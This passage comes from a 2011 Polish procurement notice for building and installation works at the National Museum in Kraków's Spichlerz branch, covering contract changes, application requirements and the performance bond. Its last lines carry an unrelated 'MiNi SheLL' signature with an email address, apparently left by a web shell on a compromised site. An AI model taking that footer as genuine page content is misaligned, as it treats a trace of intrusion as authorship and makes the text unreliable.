Wykonawca opracuje i przedstawi Zamawiającemu do akceptacji propozycje dotyczące uniknięcia lub zmniejszenia wpływu takiego wydarzenia lub okoliczności mających wpływ na realizację robót, jak też będzie współpracował przy wykonywaniu odnośnych zaleceń Zamawiającego.
Ww. okoliczności mogą wpłynąć na zmianę treści umowy z zastrzeżeniem iż nie mogą naruszać zasad zmian w umowie określonych  w pkt 1, 2 i 3.
2.	Procedura wprowadzania wszystkich zmian do umowy określonych w umowie. 
    	 Wniosek o zmianę każdorazowo musi zawierać:
1)	opis proponowanej zmiany (np.: opis proponowanych robót, dostaw i ich kosztorys, oraz program wykonania),
2)	 wpływ na wykonanie robót stanowiących przedmiot umowy - np.: czas, personel, roboty zamienne, rezygnacja z części prac itp.
3)	 proponowany termin wprowadzenia zmian, 
4)	należy podać  jakie znaczenie ma zmiana  dla zamawiającego lub czy jest konieczna dla wykonania umowy.
3.  	Wnioski o zmianę.
Wniosek o zmianę składany przez WYKONAWCE musi wpłynąć do Zamawiającego w terminie minimum 3 dni przed planowanym wprowadzeniem zmian, pisemnie. 
Wniosek Zamawiającego składany jest do wskazanej w umowie przez WYKONAWCĘ osoby w terminie minimum na 3 dni przed wprowadzeniem  zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Zamawiający nie przewiduje umieszczenia specyfikacji na stronie internetowej<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków, pok 050.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2011 godzina 14:00, miejsce: Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków, pok 050.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca powinien złożyć wniosek o dopuszczenie do udziału w postępowaniu. 

Przykładowa treść wniosku: Wniosek o dopuszczenie do udziału w postępowaniu prowadzonym w trybie przetargu ograniczonego na podst. art. 47-53 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004r. ( tekst jedn.: Dz. U 10.113.759) Zwracam się z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie. 

W załączeniu składam dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, tj.

1)  oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust 1 ustawy,
Przykładowa treść oświadczenia: 
W związku z udziałem w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie oświadczam, że spełniam warunki określone w art.22 ust.1 ustawy - prawo zamówień publicznych z dnia 29 stycznia 2004r.( tekst jedn.: Dz.U 10.113.759) w zakresie: a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; b) posiadania wiedzy i doświadczenia; c)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; d) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

2) oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust 1 oraz ust 1 pkt 2 ustawy,  dla osób fizycznych. Przykładowa treść oświadczenia: 
oświadczam, że brak jest podstaw do wykluczenia mnie z udziału w postępowaniu na podstawie art. 24 ust.1 ustawy,

 a w przypadku osób fizycznych:
Oświadczam, że nie podlegam wykluczeniu z udziału  w postępowaniu na podstawie art.  24 ust.1 pkt 2 ustawy tj: w stosunku do Wykonawcy nie otwarto likwidacji i/lub nie ogłoszono upadłości


3)  wykaz zrealizowanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie 2 realizacji polegających na wykonywaniu robót budowlanych w zakresie branż: ogólnobudowlanej z robotami wykończeniowymi, instalacji sanitarnych, elektrycznych i słaboprądowych w obiekcie zabytkowym, o wartości co najmniej 2.000.000,00 zł netto wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, 

4) wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, zakresu wykonywanych przez nie czynności oraz podstawie dysponowania ww. osobami, - oświadczenie że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane prawem uprawnienia, 

5)opłacona polisa wraz z dowodem jej opłacenia lub w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony w zakresie działalności związanej z przedmiotem zamówienia. 

 Wniosek winien zawierać dane Wykonawcy tj. nazwę Wykonawcy, adres, telefon, fax, jak też pełnomocnictwo w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia. 

Wykonawcy, występujący wspólnie, ustanawiają PEŁNOMOCNIKA do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, upoważnienie to musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich Wykonawców, - wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako Pełnomocnik - należy podać adres do korespondencji z Pełnomocnikiem oraz numer faksu, - w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców oddzielnie musi udokumentować, że posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Warunek posiadania wiedzy i doświadczenia, jak również dysponowania osobami zdolnymi do wykonania zamówienia oraz sytuacji ekonomicznej i finansowej przedsiębiorców w sumie, musi spełniać stawiane Wykonawcom warunki.

Wniosek ten winien być podpisany przez osoby upoważnione do reprezentowania Wykonawcy.


 Wraz z wnioskiem winny zostać złożone dokumenty o których mowa w punkcie III.4 oraz III.6 ogłoszenia. 

Wszystkie dokumenty przedkładane przez Wykonawcę winny być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę upoważniona do reprezentowania Wykonawcy. Wniosek o dopuszczenie do udziału w postępowaniu winien być złożony w zaklejonej kopercie opisanej w następujący sposób: wniosek o dopuszczenie do udziału w postępowaniu na Wykonanie robót budowlanych w o/MNK Spichlerz w zakresie branży ogólnobudowlanej i instalacyjnej wraz z uzyskaniem pozwolenia na użytkowanie . Przetarg ograniczony to tryb udzielenia zamówienia, w którym, w odpowiedzi na ogłoszenie o zamówieniu, wykonawcy składają wnioski o dopuszczenie do udziału w przetargu ograniczonym w terminie określonym w niniejszym ogłoszeniu. 

Wraz z zaproszeniem do składania ofert zamawiający przekazuje wykonawcy specyfikację istotnych warunków zamówienia. Wnioski o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia wraz z załącznikami i dokumentami wymaganymi w ogłoszeniu, muszą być podpisane przez osoby uprawnione do reprezentowania wykonawcy. Wniosek pod rygorem nieważności musi być sporządzony w języku polskim, w formie pisemnej, czytelnie oraz podpisany przez osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy. Informacja o złożeniu wniosku o dopuszczenie do udziału w postępowaniu może być przekazana telefonicznie przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 

 W przypadku złożenia wniosku o dopuszczenie do udziału w postępowaniu po terminie, zamawiający niezwłocznie zwróci wniosek. Zabezpieczenie należytego wykonania umowy Wykonawca zobowiązany jest do wniesienia przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości 10% wartości wynagrodzenia umownego-całkowitego, czyli kwoty brutto. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Zabezpieczenie może być wnoszone również: 1) w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej; 2) przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego; 3) przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o zastawie rejestrowym i rejestrze zastawu. Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez zamawiającego. Zabezpieczenie, w wysokości 10% wartości wynagrodzenia umownego-całkowitego, czyli kwoty brutto, wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: CITI Handlowy: 62 1030 1508 0000 0008 1536 0001 W pozostałych formach zabezpieczenie należy złożyć w siedzibie zamawiającego Al. 3-go Maja 1, 30-062 Kraków, pok. 048 w dziale księgowości przed podpisaniem umowy Jeżeli zabezpieczenie wniesiono w pieniądzu, zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wykonawcy. Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane. Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady wyniesie 30% wysokości zabezpieczenia. Kwota, o której mowa, jest zwracana nie później niż w 15. dniu po upływie okresu rękojmi za wady. Projekt nie jest finansowany ze środków Unii Europejskie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com